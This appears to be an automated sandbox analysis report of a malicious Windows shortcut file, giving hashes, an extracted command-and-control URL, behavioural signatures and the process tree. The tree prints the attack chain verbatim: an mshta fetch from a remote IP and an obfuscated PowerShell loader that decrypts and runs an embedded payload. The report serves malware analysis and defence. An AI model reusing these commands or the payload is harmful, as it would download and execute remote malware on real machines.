Analysis
-
max time kernel
120s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20240220-en -
resource tags
arch:x64arch:x86image:win7-20240220-enlocale:en-usos:windows7-x64system -
submitted
05-03-2024 02:01
Static task
static1
Behavioral task
behavioral1
Sample
05ef3c21d0ec7a856038e43c38032104948a535078649721b790548bf3260e28.lnk
Resource
win7-20240220-en
Behavioral task
behavioral2
Sample
05ef3c21d0ec7a856038e43c38032104948a535078649721b790548bf3260e28.lnk
Resource
win10v2004-20240226-en
General
-
Target
05ef3c21d0ec7a856038e43c38032104948a535078649721b790548bf3260e28.lnk
-
Size
1KB
-
MD5
53388b72e46cbc4a0110d3b6d0c0f930
-
SHA1
46881d02e2249c29ff212eb0bf15ce07828ae519
-
SHA256
05ef3c21d0ec7a856038e43c38032104948a535078649721b790548bf3260e28
-
SHA512
00646615c24cf58f28dfbd6a373f981f85738ec35ca91ef4816198fbc80573ce249083c7df60fdd0a63b42fa1e8011901555be8f5b8181490f2d767a085dc885
Malware Config
Extracted
http://91.92.251.35/Downloads/Ten/photoshop
Signatures
-
Blocklisted process makes network request 1 IoCs
Processes:
mshta.exeflow pid process 3 2264 mshta.exe -
Drops file in Windows directory 3 IoCs
Processes:
powershell.exepowershell.exepowershell.exedescription ioc process File opened for modification C:\Windows\Vss\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\Vss\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\Vss\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Processes:
mshta.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
powershell.exepowershell.exepowershell.exepid process 2468 powershell.exe 2548 powershell.exe 2080 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
powershell.exepowershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 2468 powershell.exe Token: SeDebugPrivilege 2548 powershell.exe Token: SeDebugPrivilege 2080 powershell.exe -
Suspicious use of WriteProcessMemory 15 IoCs
Processes:
cmd.exeforfiles.exepowershell.exemshta.exepowershell.exedescription pid process target process PID 2868 wrote to memory of 2608 2868 cmd.exe forfiles.exe PID 2868 wrote to memory of 2608 2868 cmd.exe forfiles.exe PID 2868 wrote to memory of 2608 2868 cmd.exe forfiles.exe PID 2608 wrote to memory of 2468 2608 forfiles.exe powershell.exe PID 2608 wrote to memory of 2468 2608 forfiles.exe powershell.exe PID 2608 wrote to memory of 2468 2608 forfiles.exe powershell.exe PID 2468 wrote to memory of 2264 2468 powershell.exe mshta.exe PID 2468 wrote to memory of 2264 2468 powershell.exe mshta.exe PID 2468 wrote to memory of 2264 2468 powershell.exe mshta.exe PID 2264 wrote to memory of 2548 2264 mshta.exe powershell.exe PID 2264 wrote to memory of 2548 2264 mshta.exe powershell.exe PID 2264 wrote to memory of 2548 2264 mshta.exe powershell.exe PID 2548 wrote to memory of 2080 2548 powershell.exe powershell.exe PID 2548 wrote to memory of 2080 2548 powershell.exe powershell.exe PID 2548 wrote to memory of 2080 2548 powershell.exe powershell.exe
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\05ef3c21d0ec7a856038e43c38032104948a535078649721b790548bf3260e28.lnk1⤵
- Suspicious use of WriteProcessMemory
PID:2868 -
C:\Windows\System32\forfiles.exe"C:\Windows\System32\forfiles.exe" /p C:\Windows\Vss /c "powershell start mshta http://91.92.251.35/Downloads/Ten/photoshop2⤵
- Suspicious use of WriteProcessMemory
PID:2608 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exestart mshta http://91.92.251.35/Downloads/Ten/photoshop3⤵
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2468 -
C:\Windows\system32\mshta.exe"C:\Windows\system32\mshta.exe" http://91.92.251.35/Downloads/Ten/photoshop4⤵
- Blocklisted process makes network request
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2264 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ivXRRY = 'AAAAAAAAAAAAAAAAAAAAAHuMmso1AMeYPTqg2zmFYGLRAevBF0dzIBqwjcA2oQ2m8+KngkChOWPmpzxbUmz9iES2+wmHBDF4NNikX/9SA+8RZl3cvQDF00jQ0YmFtDKSgyA9b4/phWWKAp1Dd8/ytR6dOWK+gl5jA/RW80HrzF8zwxTzeNjzEdYIbAKbgIvUzpdq1PfpNgSDcrLwnf6wYoWXaDo+4f2SPpaJvd5bWGTy1EJj8FAnhAlSK/pbposi/hrdUPIRQvxHXKQQXZlr5NrPpLbhHHu78ydc6wwTCvZk77DaGi39y5qB230ZYk/e7tV27V3q01tqCxdx3tBcSKA7uAMyX8Ey/mjlsAOXbJ57iEolFiQtMkeLXRQnHlGQAom0cfG+TD7Cm01qvC5pMEeNJbLbciSdu9xs9T+c7tPx+xBYuPOvZFzYMN57JaeaZXehvSTkRY2hC6KnLkyRSwtTIKg1U8Ib7rr08szQWfdMaxRKVj3PGI/wQuxJ+WJA8tcTFqvoG6e88+mNmfdwt98gTMZWjCMtvnf4CBc92ueyM5vs56/2u+UVEJzepZUpK8lTTQTWjY1hlOFe0emGmyht+KS1zFSwWZBbRyNt0o5Dy9xG4GYyKw+ZUF5kF4SxYX6Yv7NLLkRJ1zA1vynUhhQD0GSeGUgNQ+quSJnyFSiEdpEa8NFWaep0COP5xyMiCOqi/EypECYLwCKEOwNqBqZ0/BjRXs3On8DJzDn994w83i+XNhIcnKswDJ1rV9Alxlwmt19nbz+Dn58l/ZcLWwvS6I+mTp8UBEk0CSxgzPNb8mX3rVtEvxZVuhLJa7/XWLcWSIGEtaXWpgRM/SbMXkdj7MO7V+BRMP1qf/dcU/TUhY1lotTnnHCHRFeLb1d1';$ftUus = 'ckRTZUh1VlFmVnlTa2luUmVGS3hIRGlVRktJVGF1aEI=';$qOFHjUF = New-Object 'System.Security.Cryptography.AesManaged';$qOFHjUF.Mode = [System.Security.Cryptography.CipherMode]::ECB;$qOFHjUF.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$qOFHjUF.BlockSize = 128;$qOFHjUF.KeySize = 256;$qOFHjUF.Key = [System.Convert]::FromBase64String($ftUus);$svgDF = [System.Convert]::FromBase64String($ivXRRY);$JuzxcfzI = $svgDF[0..15];$qOFHjUF.IV = $JuzxcfzI;$ceTYAICRx = $qOFHjUF.CreateDecryptor();$SsqoZtLKt = $ceTYAICRx.TransformFinalBlock($svgDF, 16, $svgDF.Length - 16);$qOFHjUF.Dispose();$JFlSsSI = New-Object System.IO.MemoryStream( , $SsqoZtLKt );$wBZvtko = New-Object System.IO.MemoryStream;$pFgGcVXpX = New-Object System.IO.Compression.GzipStream $JFlSsSI, ([IO.Compression.CompressionMode]::Decompress);$pFgGcVXpX.CopyTo( $wBZvtko );$pFgGcVXpX.Close();$JFlSsSI.Close();[byte[]] $xIpqeQj = $wBZvtko.ToArray();$BomjpubV = [System.Text.Encoding]::UTF8.GetString($xIpqeQj);$BomjpubV | powershell -5⤵
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2548 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -6⤵
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2080
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5e7e999130df882fd5027d857b21f2526
SHA1c100ff6c70e3e8be70c2045aa4ba1bc3834006ed
SHA2567d9ff825b357ce14f5a689ff8b99e6b92457296a83de2e0f01c6070909433af7
SHA5129591541885a94e97d36c693fe49a64c6be315e9d45eb46350bd5e1e482dcc8d14159f8f6175ef1ed87c81f686b938fa354f2b83b82c34f0c29197fd8dbd7c6ac